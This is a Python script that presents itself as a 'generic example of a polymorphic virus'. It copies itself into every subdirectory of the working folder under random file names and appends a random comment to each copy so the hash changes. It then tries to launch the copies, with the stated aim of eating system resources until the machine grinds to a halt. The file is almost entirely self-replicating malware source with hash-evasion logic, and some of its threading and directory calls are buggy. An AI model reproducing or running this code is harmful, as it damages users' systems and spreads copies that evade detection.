#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 22:16:15 2023
Purpose: This is just a generic example of a polymorphic virus. When ran, it creates a copy of itself
         along wtih a random string to generate a new hash making it harder to be discovered. This virus
         main purpose is to consume system resources and slow down the computer.

Warning: THIS WILL FILL YOUR COMPUTER WITH PYTHON FILES AND CONSUME RESOURCES INTO A SCREECHING HALT!
@author: CyberTools101
"""

import os
from threading import Thread
import sys
import random
import string

def writeIntoFile(file, lines):
    count = len(lines)
    start = 0
    for line in lines:
        start = start + 1
        # we dont want to copy the random string added to the end
        if start == (count - 1):
            break
        file.write(line)

def previousFolder(file, lines):
    count = len(lines)
    start = 0
    for line in lines:
        start = start + 1
        # we dont want to copy the random string added to the end
        if start == (count - 1):
            break
        file.write(line)
        if start == 14:
            if not ("os.chdir('../')" in lines):
                print("this is where it is")
                file.write("\nos.chdir('../')\n")

def runFunc(dir, filename):
    os.chdir(dir)
    os.system('python3 .\\' + filename)

#get the current file
thisfile = os.path.basename(__file__)

directory = os.getcwd()



print(thisfile)

#open up the file and read it
f = open(thisfile, "r")
lines = f.readlines()
f.close()

#Create the new file and include a different name
filename = "newpython{randomness}.py".format(randomness="".join(random.choices(string.ascii_lowercase + string.digits, k=5)))


#start copying the contents of the files to the new one
#try:
#    h = open("..\\" + filename, "w")
#    previousFolder(h, lines)
#    h.write('\n#{chaos}'.format(chaos="".join(random.choices(string.ascii_lowercase + string.digits, k=5))))
#    h.close()
#    if os.path.isfile("..\\" + filename):
#        thread = Thread(target=runFunc("..\\" + filename))
#        thread.start()

#except:
#    pass


    
    
for x in os.walk(directory):
    print(x[0])
    g = open(x[0] + "\\" + filename, "w")
    writeIntoFile(g, lines)
    g.write('\n#{chaos}'.format(chaos="".join(random.choices(string.ascii_lowercase + string.digits, k=5))))
    g.close()
    

for x in os.walk(directory):
    thread = Thread(target=runFunc(dir, filename))
    thread.start()
    



#Ensure this thread gets closed
sys.exit()
